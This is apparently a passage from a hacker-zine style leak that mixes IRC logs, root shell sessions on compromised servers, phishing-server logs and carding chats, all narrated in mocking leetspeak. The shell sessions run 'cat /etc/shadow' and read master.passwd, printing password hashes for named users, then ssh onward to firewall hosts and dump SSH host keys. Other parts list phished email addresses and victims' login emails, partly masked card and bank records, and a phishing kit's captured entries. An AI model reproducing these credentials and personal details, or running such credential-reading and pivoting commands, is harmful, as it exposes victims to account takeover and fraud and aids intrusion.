IceShaman -> tgo : checked all eval() assert()
IceShaman -> tgo : checked for system() exec() shell_exec() passthru() etc
CcSsNET -> CcSsNET : LC 1145381100.72560
CcSsNET -> CcSsNET : LC 1145381160.14562
tgo -> IceShaman : wtf
tgo -> IceShaman : ok sorry
tgo -> IceShaman : my isp keeps jumping
tgo -> IceShaman : whot old you about the bug how you know it exists?
IceShaman -> tgo : because someone used it
IceShaman -> tgo : someone managed to write files on HTS
CcSsNET -> CcSsNET : LC 1145381220.21561
IceShaman -> tgo : and they used the same thing on enigmagroup
IceShaman -> tgo : I was told it was a flaw in IPB
IceShaman -> tgo : some people also hacked us 2 days ago
IceShaman -> tgo : saying they're the same people
IceShaman -> tgo : and it's a bug in a php script
IceShaman -> tgo : namely IPB
IceShaman -> tgo : securicore
CcSsNET -> CcSsNET : LC 1145381280.20105
IceShaman -> tgo : and as you know PHP
CcSsNET -> CcSsNET : LC 1145381340.72257
IceShaman -> tgo : I thought I'd ask you if you knew any more holes
IceShaman -> tgo : that could lead to remote execution
tgo -> IceShaman : did you check logs?
IceShaman -> tgo : he used POST
tgo -> IceShaman : to what pages?
IceShaman -> tgo : it isnt any of the functions used to run commands
IceShaman -> tgo : tgo, no idea
tgo -> IceShaman : the logs should say what pages
IceShaman -> tgo : there are no logs
IceShaman -> tgo : I said he used POST
IceShaman -> tgo : POST isn't logged
tgo -> IceShaman : apache logs??
CcSsNET -> CcSsNET : LC 1145381400.07966
IceShaman -> tgo : POST ISNT LOGGED
tgo -> IceShaman : ...
IceShaman -> tgo : if you post data to a form
IceShaman -> tgo : it isnt logged by apache
IceShaman -> tgo : this is basic stuff tgo
IceShaman -> tgo : apachde only logs GET requests
tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:53:24 -0600] "POST /pMa/left.php HTTP/1.1" 200 1425
tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:53:32 -0600] "POST /pMa/left.php HTTP/1.1" 200 1002
tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:54:05 -0600] "POST /pMa/left.php HTTP/1.1" 200 1002
tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:54:29 -0600] "POST /pMa/left.php HTTP/1.1" 200 1347
tgo -> IceShaman : it says the page
tgo -> IceShaman : that will give you a big clue
IceShaman -> tgo : oh ffs
IceShaman -> tgo : no it wont
CcSsNET -> CcSsNET : LC 1145381460.89561
IceShaman -> tgo : none of the data is there dude
IceShaman -> tgo : it's forums
IceShaman -> tgo : you any idea how many people post data an hour?
CcSsNET -> CcSsNET : LC 1145381520.57948
tgo -> IceShaman : dont you have the ip of who did it
tgo -> IceShaman : and idnt you say you had to have admin access?
IceShaman -> tgo : I do
IceShaman -> tgo : no
IceShaman -> tgo : you have to have admin access
IceShaman -> tgo : for a sploit I found
IceShaman -> tgo : while auditing the code
CcSsNET -> CcSsNET : LC 1145381580.95560
tgo -> IceShaman : ah
CcSsNET -> CcSsNET : LC 1145381640.93560
CcSsNET -> CcSsNET : LC 1145381700.67653
IceShaman -> tgo : tried IPs
IceShaman -> tgo : cant see any POST requests at all
IceShaman -> tgo : and the gets are clean
tgo -> IceShaman : hmm
CcSsNET -> CcSsNET : LC 1145381760.32561
CcSsNET -> CcSsNET : LC 1145381820.81560
CcSsNET -> CcSsNET : LC 1145381880.02561
CcSsNET -> CcSsNET : LC 1145381940.38560
CcSsNET -> CcSsNET : LC 1145382000.01481
CcSsNET -> CcSsNET : LC 1145382060.08561
CcSsNET -> CcSsNET : LC 1145382120.94561
CcSsNET -> CcSsNET : LC 1145382180.60561
CcSsNET -> CcSsNET : LC 1145382240.29559
IceShaman -> tgo : nope nothing
4ft3r l1k3 4 m0nthz 0f sn1ff1ng th1z sh1t.. w3 h4v3 c0m3 t0
n0t1c3...
R4V3 H4Z N0 FUQN SK1LL 1N L1F3.
B4Q 2 H4QL0GZ
root@alpha:~# w
08:48:53 up 70 days, 22:08, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
amanda :0 - 08Feb06 ?xdm? 4days 13.71s x-session-manag
root@alpha:~# cat /etc/shadow
root:$1$NVk7VnVj$M0U5yPFdlz/6uNaZoKhZG0:13248:0:99999:7:::
daemon:*:13014:0:99999:7:::
bin:*:13014:0:99999:7:::
sys:*:13014:0:99999:7:::
sync:*:13014:0:99999:7:::
games:*:13014:0:99999:7:::
man:*:13014:0:99999:7:::
lp:*:13014:0:99999:7:::
mail:*:13014:0:99999:7:::
news:*:13014:0:99999:7:::
uucp:*:13014:0:99999:7:::
proxy:*:13014:0:99999:7:::
www-data:*:13014:0:99999:7:::
backup:*:13014:0:99999:7:::
list:*:13014:0:99999:7:::
irc:*:13014:0:99999:7:::
gnats:*:13014:0:99999:7:::
nobody:*:13014:0:99999:7:::
Debian-exim:!:13014:0:99999:7:::
rave:!!:13014:0:99999:7:::
identd:!:13014:0:99999:7:::
sshd:!:13014:0:99999:7:::
mysql:!:13015:0:99999:7:::
The_mystiC:$1$2wdFYnnK$b.6Ijx98d2.i2O1z5AKp80:13015:0:99999:7:::
anope:!:13015:0:99999:7:::
infobot:!:13015:0:99999:7:::
jmoschetti45:$1$c63T/2TL$vR/0DZREM5OlbqKhl0GxZ1:13015:0:99999:7:::
saned:!:13020:0:99999:7:::
gdm:!:13020:0:99999:7:::
messagebus:!:13020:0:99999:7:::
hal:!:13020:0:99999:7:::
amanda:$1$GfvvfyoN$/7eBTzRmPNy1Zj16Jsfpt/:13020:0:99999:7:::
ftp:!:13024:0:99999:7:::
extreme:!:13031:0:99999:7:::
bind:!:13031:0:99999:7:::
cvsweb:!:13106:0:99999:7:::
dylan:$1$Zk.g.LVM$B.5YF4wIe0KoecaptojHC1:13106:0:99999:7:::
cvsd:!:13108:0:99999:7:::
cold:$1$A7n8z05o$9sAQKI6SplM4xqKtSs6vO1:13248:0:99999:7:::
svn:!:13218:0:99999:7:::
root@alpha:~# exit
logout
Connection to rosiello.net closed.
N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! RAVE IS ELITE. PM IS ELITE. N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!!
09.txt -~-~-~ 3th1cz@exploits.cx
dianaco@aol.com
brittk653@aol.com
dianejt@aol.com
gordgerson@aol.com
sallys7138@aol.com
dianesmc@aol.com
bb27588@aol.com
kdailey986@aol.com
dialrep@aol.com
samalibu@aol.com
tomcgordon@aol.com
tomastate@aol.com
gortman@aol.com
dianehm@aol.com
samanauy@aol.com
diana800@aol.com
p
dhockey31@aol.com
cluless3@aol.com
pdiddy6734@aol.com
th1s 1s pr3vi3w 0f 3m41l 4ddr3zz3z th3y ph1sh3d..
66.135.213.75 - - [01/Feb/2005:01:30:55 +0200] "GET /www.paypal.com/us/cgi-bin/update.php?login_email=Stan@4Focus.com HTTP/1.1" 200 32718 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Java/1.4.1_02"
66.135.213.75 - - [01/Feb/2005:01:30:58 +0200] "GET /www.paypal.com/us/cgi-bin/update.php?login_email=Stan@4Focus.com HTTP/1.1" 200 32718 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
24.206.73.128 - - [01/Feb/2005:14:30:04 +0200] "GET /www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted] HTTP/1.1" 200 32731 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:05 +0200] "GET /www.paypal.com/us/cgi-bin/css/pp_styles_111402.css HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:06 +0200] "GET /www.paypal.com/us/cgi-bin/css/pp_table_styles.css HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:07 +0200] "GET /www.paypal.com/us/cgi-bin/js/pp_main.js HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:07 +0200] "GET /www.paypal.com/us/cgi-bin/pp_check.js HTTP/1.1" 200 2948 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/scr/pixel.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/logo/paypal_logo.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_request_money.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_on_my_account.gif HTTP/1.1" 200 494 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_send_money.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/bg.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_merchant_tools.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_auction_tools.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/SA_off_overview.gif HTTP/1.1" 200 168 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/SA_off_withdraw.gif HTTP/1.1" 200 175 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
h3r3 1s r3sultz 0f th31r ph1sh1ng [th3r3 w4z lyk3 10000 3ntr13z l1k3 th1z]
Stan@4Focus.com
Stan@4Focus.com
larry848@earthlink.net&login_password=[editted]
larry.barker@honeywell.com&login_password=[editted]
larry@fish-jersey.com&login_password=[editted]
larry.brophy@trintech.com&login_password=[editted]
larez2@juno.com&login_password=[editted]
lare@netvalue.net&login_password=[editted]
larry@churchamerica.org&login_password=[editted]
larry.barker@honeywell.com&login_password=[editted]
larujay@rcn.com&login_password=[editted]
sndrfh@sdhtr.rty&login_password=[editted]
larbet41@juno.com&login_password=[editted]
larry.benedet1@sympatico.ca&login_password=[editted]
yankeegirl9@hotmail.com&login_password=[editted]
larryb@sanantonio.gov&login_password=[editted]
Laraine@comcast.net&login_password=[editted]
thehudsons@verizon.net&login_password=[editted]
joepo@po.com&login_password=[editted]
larry@jnabbottdist.com&login_password=[editted]
larry.montgomery@verizon.net&login_password=[editted]
powermfg@aol.com&login_password=[editted]
larabuttigieg001@hotmail.com&login_password=[editted]
info@mypreneed.com&login_password=[editted]
h3r3 th3y k3pt th3 1mp0rt4nt 1nf0rm4t10n
<PONiC> [19:06:32] <l~|Draupner|> [DRAUPNER] - 1. Games at
draupner.no-ip.org:45093 is UP (login: 760ms ping: N/Ams)
<PONiC> [19:06:36] <l~|Draupner|> [DRAUPNER] - 2. Dvdr at oden.no-ip.org:45093
is UP (login: 1301ms ping: N/Ams)
<PONiC> [19:06:40] <l~|Draupner|> [DRAUPNER] - 3. Mvid,Tv,Xvid at
miming.no-ip.org:45093 is UP (login: 1254ms ping: N/Ams)
<PONiC> [19:06:44] <l~|Draupner|> [DRAUPNER] - 4. Xbox,Ps2 at
daluniz.no-ip.org:45093 is UP (login: 2339ms ping: N/Ams)
<PONiC> [19:06:48] <l~|Draupner|> [DRAUPNER] - 5. Svcd,Swe-svcd at
gram.no-ip.org:45093 is UP (login: 2133ms ping: N/Ams)
<PONiC> [19:06:52] <l~|Draupner|> [DRAUPNER] - 6. MP3 at frej.no-ip.org:45093 is
UP (login: 1170ms ping: N/Ams)
<PONiC> [19:06:55] <l~|Draupner|> [DRAUPNER] - 7. 0DAYS,APPS at
snotra.no-ip.org:45093 is UP (login: 1204ms ping: N/Ams)
l00kz lyk3 th31r sp4mm1ng sh3llz
Mar 09 00:11:23 <|Razor|> email = *************@libero.it
Mar 09 00:11:23 <|Razor|> phone = ****-***-******
Mar 09 00:11:23 <|Razor|> street = *** ***** ***** 36
Mar 09 00:11:23 <|Razor|> city = *******
Mar 09 00:11:23 <|Razor|> state = IMPERIA
Mar 09 00:11:25 <|Razor|> country = Italy
Mar 09 00:11:31 <|Razor|> zip = 18038
Mar 09 00:11:33 <|Razor|> cardholder = ***** *********
Mar 09 00:11:35 <|Razor|> ccnumber = ****************
Mar 09 00:11:37 <|Razor|> expiremonth = 05
Mar 09 00:11:39 <|Razor|> expireyear = 2006
Mar 09 00:11:43 <|Razor|> cvv2 = *******
Mar 09 00:11:45 <|Razor|> bankname = BANCA CARIGE
Mar 09 00:11:47 <|Razor|> bankphone = 0039-184-590611
Mar 09 00:11:49 <|Razor|> are vzemi italianska
Mar 09 00:12:33 <|Razor|> na edna godina sa mi povecheto
Mar 09 00:12:37 <|Razor|> imah edin mnogo bogat arhiv
Mar 09 00:12:39 <|Razor|> okolo 500 karti
Mar 09 00:12:53 <|Razor|> obache kato usetiha che sme krali ot onzi
magazin qvno e imalo mnogo golqma akciq i sa spreni vsichki
Mar 09 00:13:07 <|Razor|> ot nachaloto ot kakto sme gi krali pochti
vsichki gledam po edno vreme spreni
Mar 09 00:13:12 <joffer2> <|Razor|> cvv2 = *******
Mar 09 00:13:23 <|Razor|> 557 e
m0r3 budd13z 0f j0ff3r h3lp h1m w1th CC tr4d1ng
<|Razor|> country = US
<|Razor|> ccmth = 04-Apr
<|Razor|> bcity = Allen
<|Razor|> rname =
<|Razor|> bzip = 75013
<|Razor|> name = D1CK Kahl
<|Razor|> sname =
<|Razor|> ccname = D1CK L Kahl
<|Razor|> phone = XXX-XXX-XXXX
<|Razor|> state = TX
<|Razor|> bstreet = XXX XXXXXXX Dr
<|Razor|> bcountry = US
<|Razor|> city = XXXXX
<|Razor|> cctype = VISA
<|Razor|> ccard = XXXXXXXXXXXXXXXX
<|Razor|> cvv2 = 833
<|Razor|> R1 = NO
<|Razor|> zip = XXXXX
<|Razor|> ccyear = 2006
<|Razor|> email = ******@sbcglobal.net
<|Razor|> street = *** ****** **
<|Razor|> bstate = TX
Username: joffer123
Password: J0FF3R!@
CC: 1232131232132132
Cvv2: 1233
Exp Date(M-D-Y): 01-1-05
PIN: 1243
SSN:
Father Name:
F Dob :
Mother Name:
M Dob :
Spouse Name :
S dob :
Full M :
dob :
Name on card: asd sad
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 85.187.1.208
Date/time: 28.03.2005, 1:26am
- using Ebay scam made by RdE & jam3s -
Username: joffer123
Password: J0FF3R!@
CC: 1232131232132132
Cvv2: 1233
Exp Date(M-D-Y): 01-1-05
PIN: 1243
SSN:
Father Name:
F Dob :
Mother Name:
M Dob :
Spouse Name :
S dob :
Full M :
dob :
Name on card: asd sad
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 85.187.1.208
Date/time: 28.03.2005, 1:26am
- using Ebay scam made by RdE & jam3s -
Username: joffer123
Password: J0FF3R!@
CC: 1424124124121424
Cvv2: 4214
Exp Date(M-D-Y): 01-1-05
PIN: 1241
SSN:
Full M :
dob :
Name on card: asd sad
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 85.187.1.208
Date/time: 28.03.2005, 1:28am
Username: joffer123
Password: J0FF3R!@
CC: 1234561234561234
Cvv2: 1232
Exp Date(M-D-Y): 01-1-05
PIN: 2131
Name on card: asd sad
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 85.187.1.208
Date/time: 28.03.2005, 1:29am
Username: joffer123
Password: J0FF3R!@
CC: 1244141241214214
Cvv2: 1421
Exp Date(M-D-Y): 01-2-06
PIN: 4211
Name on card: TEST POSLEDEN
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 85.187.1.208
Date/time: 28.03.2005, 2:31am
Username: joffer123
Password: J0FF3R!@
CC: 3293181539518953
Cvv2: 1234
Exp Date(M-D-Y): 01-1-05
PIN: 1234
Name on card: KOLJO E PEDAL
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: ::1
Date/time: 28.03.2005, 17:36pm
Username: jpollarduk
Password: XXXXXXXXXXXXXX
CC: XXXXXXXXXXXXXXXX
Cvv2: 228
Exp Date(M-D-Y): 04-6-07
PIN: 2678
Name on card: XXXXXXXXXXXXXX
First name: XXXXXXXXXXXXXX
Last name:
Company:
Address:
City:
State:
Country:
Postal code:
Phone number: --
Seconday phone: --
IP: 62.252.32.**
Date/time: 29.03.2005, 23:15pm
Username: kerrbear1724
Password: XXXXXXXX
CC: XXXXXXXXXXXXXXXX
Cvv2: 745
Exp Date(M-D-Y): 03-31-07
PIN: 8111
Name on card: XXXXXXXXXXXXX
First name: XXXXX
Last name: XXXXX
Company:
Address: XXXXXXXXXXXXXXXXXXXXX
City: Pittsburgh
State: PA
Country:
Postal code: 15210
Phone number: XXX-XXX-XXXX
Seconday phone: --
IP: 151.195.107.**
Date/time: 29.03.2005, 23:28pm
Username: templedoc23
Password: XXXXXXXX
CC: XXXXXXXXXXXXXXXX
Cvv2: 611
Exp Date(M-D-Y): 06-6-05
PIN: 0203
Name on card: XXXXXXXXXXXXXX
First name: XXXXXXXX
Last name: XXXX
Company:
Address: XXXXXXXXXXXXXXXXXXXXXXXX
City: Philadelphia
State: PA
Country:
Postal code: 19107
Phone number: XXX-XXX-XXXX
Seconday phone: --
IP: 155.247.166.**
Date/time: 29.03.2005, 23:28pm
Username: osblue
Password: XXXXXXX
CC: XXXXXXXXXXXXXXXX
Cvv2: 623
Exp Date(M-D-Y): 02-29-08
PIN: none
Name on card: XXXXXXXXXXXXX
First name: XXXX
Last name: XXXXXX
Company:
Address: XXXXXXXXXXXXXX
City: armada
State: MI
Country:
Postal code: 48005
Phone number: XXX-XXX-XXXX
Seconday phone: --
IP: 64.136.26.***
Date/time: 29.03.2005, 23:29pm
Username: joffer123
Password: J0FF3R!@
CC: 1111111111111111
Cvv2: 1111
Exp Date(M-D-Y): 04-1-07
PIN: 1111
Name on card: 123333333333333333333333333333
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 66.92.22.164
Date/time: 29.03.2005, 23:42pm
j0ff3r'z db 0f st0ld3n sh1t.
Account Nickname: Checking
Account Type/Number: INTEREST MAXIMIZER ACCOUNT-2068
Type: Debit
Transaction Description: Online Banking transfer to Sav **** Conf# **********;
Rodgers, *******
Date: 04/12/2005
Amount: $1,000.00
j0ff3r us1ng th3 st0ld3n 4cc0untz.
-~-~-~-~
truzt exploits.cx / securitydot.net! fr0m th31r f4q l0c4t3d @
http://exploits.cx/?path=/FAQ/&cid=6#11
"
How do we know your not just selling the exploits to
DDoSers/Spammers/Extortionists?
We are not selling the private exploits we buy to anyone! We do realize however
that gaining your trust will take time.Unfortunately proving this for a fact is
impossible.
"
d1spr0v1ng 1t w4z 4z 34zy 4z 0wn1ng th3z3 dumb b1tch3z.
10.txt -~-~-~ ethics@idefense.com
n0w l3tz ch3ck 0ut h0w idefense c0mp4r3z.
# uname -a
Linux srv01-sun.seifried.org 2.6.9-34.0.2.EL #1 Fri Jun 30 10:22:45 EDT 2006 x86_64 x86_64 x86_64 GNU/Linux
# w
01:45:43 up 5 days, 29 min, 0 users, load average: 0.00, 0.01, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
# ls -al /home
total 24
drwxr-xr-x 3 root root 4096 Feb 20 05:17 .
drwxr-xr-x 24 root root 4096 Jul 13 01:16 ..
drwx------ 5 seifadm seifadm 4096 May 31 02:19 seifadm
# ssh fw01.seifried.org
root@fw01.seifried.org's Password:
# grep -v '*' /etc/master.passwd | grep -v '!'
root:$2a$08$y1pmAsmDkwNWN7W5qacH0OgdwdOkxKr.TdtzboIDRcwqW9Y/oKaRC:0:0:daemon:0:0:Charlie &:/root:/bin/ksh
seifadm:$2a$06$./VaGlR.ESmUaKGln1wUZe8yTfoJczQzXpT1h.jUqDYAoulnhdmk2:1000:1000::0:0:seifadm:/home/seifadm:/bin/ksh
dhartmei:$2a$06$EbtJldePdQwD8ajM4nU45ummi8UuFHyyd6j59fJgW4sDtU5qKpoBe:1001:1001::0:0:dhartmei:/home/dhartmei:/bin/ksh
vdanen:$2a$06$R9uNq4qNO85xEVIdyTFmvuDPGWk2CcbByLe562sewIX8.qGJW88Ym:1002:1002::0:0:Vincent Danen:/home/vdanen:/bin/ksh
# ssh fw00.seifried.org
root@fw00.seifried.org's Password:
# grep -v '*' /etc/master.passwd | grep -v '!'
root:$2a$08$IolfxFNJ2/ijWriQ1B2xwu4nVUbfVH4kLQfQrhAl8DTGmU0EXDTmC:0:0:daemon:0:0:Kurt Seifried,,,:/root:/bin/ksh
seifadm:$2a$06$9YzLc71Cadc.NLA63Mz0duCaSfIUsKhQpwzemu9HoZzVVcaZpIrQi:1000:1000::0:0:SEIFRIED ADMIN:/home/seifadm:/bin/ksh
dhartmei:$2a$06$EbtJldePdQwD8ajM4nU45ummi8UuFHyyd6j59fJgW4sDtU5qKpoBe:1001:1001::0:0:dhartmei:/home/dhartmei:/bin/ksh
vdanen:$2a$06$xa06iQRtNd8RKcSLEuG9M.Z8FEAG95PscWDClhtIbdfuoy8r1paN2:1002:1002::0:0:Vincent Danen:/home/vdanen:/bin/ksh
# cat /root/.ssh/known_hosts
fw01,216.234.189.4 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ==
srv01,216.234.189.7 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAt8JHM7YHSlM4OIV87+tu2/eDY8ImO/k5uPsJomIqlC7/hN45SXsZ07gLQ8OEBmNPyN+bNWP2TRvjykcBsSeVIAy8jdZE1yt5lT4gGAOGyfawZwBh1EFqCnHoECqc2u3Cha1bLV+jDNAwzTj5oQrv9DMcBo8T3kuDuovL/DJJLjk=
fw01.seifried.org ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ==
srv05,216.234.189.11 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEApEmVQUZUs6ajW/6Kyddfj3zMa60gzYmbBTuDELy1I9bfYHO6D4835HlJnT3cNovuACoMrzs9y0tJGANvox5rJ20Slm6KE2PH0twS0lZcd4cOMtKhOUcGuch/aXTNnGDhrsFQNf3PHxKRuM0AT2qjvLLlghIhYntLSrergb7CZT0=
srv00,216.234.189.6 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuL/2zr2HSNfyBDuuHFoCbvS8Q/rZeCXFTMWZOPdvMEFZ6wve9phCPb1dwEj7kOlqTpZ+iq9uH/LCPfdVjaBIOAcN4BrZRuv3ABIZZ3MndkD+Q5kfoTZ7LUYgivladV+AYwscyxjU3LvPh4AFM/HrrQBJvVTN39ty/qNOmPh89sc=
undeadly.org,66.51.111.60 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtRx9+LNuWKXBPRsyMWk3Snzzrcft91cWtQc3d8i+qccY42Rz2QAFPuxLeBiOYwE0EI0TL/t3gmhML5ywktFN8jhWNk+m/hLSYTVOZ4ckXg37uJLdJRIx3KlybJhlGuXADYCDcjIfj4cNOnqW9KHwJmFIc/X7PoBXojYZAXlXk90ELl4csAwcDCZRInh49vEaRHE4jj/yvgpXrZBErTFZgmY21Btnbmj1olRRs2HfDd60t/BzGXQs9P6gI2EP01ONF9OWZAX+CNRC/ru+yVR/mVx0i4Ah5Osd5GZIhxMQLLjYW/HOd/+weIPc09xv4io+01VyH2zmOOf/rOAYJcBTSQ==
sputnik.firstfoundation.ca,142.179.165.115 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAv8//etsP6DIW3wKQl0ggaGrLb9Y2JR9CzW6ADFyDZwWwIpBZ7dE+0dYN4LeyrXWhVUnX1QDY5z8CpI6zoLpmrmKFMyoxE+fkfqFAbQeqcjJwnf77XHYaqEYYcOyssZFD67M/hu9LmcJXZ725hWmCLZH3SNblS1wVqIBXuv7ZNkk=
# ssh srv00.seifried.org
root@srv00.seifried.org's Password:
# cat root/.ssh/known_hosts
